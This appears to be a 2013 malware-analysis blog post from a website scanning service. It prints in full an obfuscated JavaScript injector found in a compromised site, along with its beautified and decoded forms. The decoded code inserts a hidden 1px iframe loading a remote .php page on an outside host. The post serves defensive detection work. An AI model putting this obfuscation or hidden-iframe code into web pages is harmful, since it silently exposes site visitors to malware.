Tuesday, April 9, 2013

Malicious iframe to remote .php file


Obfuscated malicious JavaScript code generated hidden iframe to remote .php file

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 34 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon Apr 8 22:32:30 2013
Infected website's files: 34
Website malware scan report link: http://goo.gl/yKT7D


Website malware scanner report


Threat snapshot:

Malicious obfuscated javascript detected 


Threat dump:


[[<script type='text/javascript' language='javascript' >
                                                                                                                                                                                                                                                          p=parseInt;
ss=(123)?String.fromCharCode:0;
asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!78!6@!71!6@!73!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!6f!6e!65!73!74!65!70!62!75!6@!6c!64!6@!6e!67!73!7@!73!74!65!6d!2e!63!6f!6d!2f!44!6f!63!75!6d!65!6e!74!73!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!78!6@!71!6@!73!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!78!6@!71!6@!73!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!78!6@!71!6@!73!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!78!6@!71!6@!73!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");
try
{
document.body%26=0.1
}
catch(gdsgsdg)
{
zz=3;
dbshre=156;
if(dbshre)
{
vfvwe=0;
try
{
document;
}
catch(agdsg)
{
vfvwe=1;
}
if(!vfvwe)
{
e=eval;
}
s="";
if(zz)for(i=0;
i-516!=0;
i++)
{
if(window.document)s+=ss(p(asgq[i],16));
}
if(window.document)e(s);
}
}

 </script>]]


Malware entry



Beautified script


  1. = parseInt;
  2. ss = (123) ? String.fromCharCode : 0;
  3. asgq ="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!78!6@!71!6@!73!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!6f!6e!65!73!74!65!70!62!75!6@!6c!64!6@!6e!67!73!7@!73!74!65!6d!2e!63!6f!6d!2f!44!6f!63!75!6d!65!6e!74!73!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!78!6@!71!6@!73!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!78!6@!71!6@!73!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!78!6@!71!6@!73!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!78!6@!71!6@!73!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!78!6@!71!6@!73!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");
  4. try {
  5.     document.body &= 0.1
  6. } catch (gdsgsdg) {
  7.     zz = 3;
  8.     dbshre = 156;
  9.     if (dbshre) {
  10.         vfvwe = 0;
  11.         try {
  12.             document;
  13.         } catch (agdsg) {
  14.             vfvwe = 1;
  15.         }
  16.         if (!vfvwe) {
  17.             e = eval;
  18.         }
  19.         s = "";
  20.         if (zz) for (= 0; i - 516 != 0; i++) {
  21.                 if (window.document) s += ss(p(asgq[i], 16));
  22.         }
  23.         if (window.document) e(s);
  24.     }
  25. }


Simplified version of malicious JavaScript


  1. asgq = "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!78!6@!71!6@!73!20...."
  2. = "";
  3. for (= 0; i - 516 != 0; i++) { s += String.fromCharCode(parseInt(asgq[i], 16)); }  
  4. eval(s);


Malicious payload analysis


Decoded payload injects hidden iframe to http://www[.]onestepbuildingsystem[.]com/Documents/esd[.]php


  1. (function () {
  2.    var xiqis = document.createElement('iframe');
  3.    xiqis.src = 'http://www.onestepbuildingsystem.com/Documents/esd.php';
  4.    xiqis.style.position = 'absolute';
  5.    xiqis.style.border = '0';
  6.    xiqis.style.height = '1px';
  7.    xiqis.style.width = '1px';
  8.    xiqis.style.left = '1px';
  9.    xiqis.style.top = '1px';
  10.    if (!document.getElementById('xiqis')) {
  11.        document.write('<div id=\'xiqis\'></div>');
  12.        document.getElementById('xiqis').appendChild(xiqis);
  13.    }
  14. })();


Blacklisting status


The website is Suspicious on Google Safe Browsing.



Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.